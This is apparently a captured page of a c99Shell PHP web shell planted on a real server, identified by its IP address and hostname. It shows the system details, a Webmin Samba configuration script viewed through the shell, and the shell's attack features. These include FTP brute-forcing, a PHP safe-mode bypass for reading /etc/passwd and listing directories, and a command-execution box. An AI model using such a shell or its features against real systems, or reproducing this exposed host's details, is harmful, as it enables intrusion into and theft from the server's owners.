110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/samba/ drwxr-xr-x Free 50.94 GB of 127.8 GB (39.86%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/usr/libexec/webmin/samba/ drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#!/usr/bin/perl
# save_bind.cgi
# Save inputs from conf_bind.cgi

require './samba-lib.pl';
&ReadParse();
&lock_file($config{'smb_conf'});
$global = &get_share("global");

# check acls

&error_setup("$text{'eacl_aviol'}ask_epass.cgi");
&error("$text{'eacl_np'} $text{'eacl_pcm'}") unless $access{'conf_bind'};
 
&error_setup($text{'bind_err'});
&setval("winbind enable local accounts", $in{'local'} ? "yes" : "no");

&setval("winbind trusted domains only", $in{'trust'} ? "yes" : "no");

&setval("winbind enum users", $in{'users'} ? "yes" : "no");

&setval("winbind enum groups", $in{'groups'} ? "yes" : "no");

&setval("winbind use default domain", $in{'defaultdomain'} ? "yes" : "no");

$in{'realm'} eq "" || $in{'realm'} =~ /^\S+$/ || &error($text{'bind_erealm'});
&setval("realm", $in{'realm'});

$in{'cache'} =~ /^\d+$/ || &error($text{'bind_ecache'});
&setval("winbind cache time", $in{'cache'});

$in{'uid'} eq "" || $in{'uid'} =~ /^\d+\-\d+$/ || &error($text{'bind_euid'});
&setval("idmap uid", $in{'uid'});

$in{'gid'} eq "" || $in{'gid'} =~ /^\d+\-\d+$/ || &error($text{'bind_egid'});
&setval("idmap gid", $in{'gid'});

&setval("idmap backend", $in{'backend_def'} ? "" : $in{'backend'});

if ($global) { &modify_share("global", "global"); }
else { &create_share("global"); }
&unlock_file($config{'smb_conf'});
&webmin_log("bind", undef, undef, \%in);
&redirect("");

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: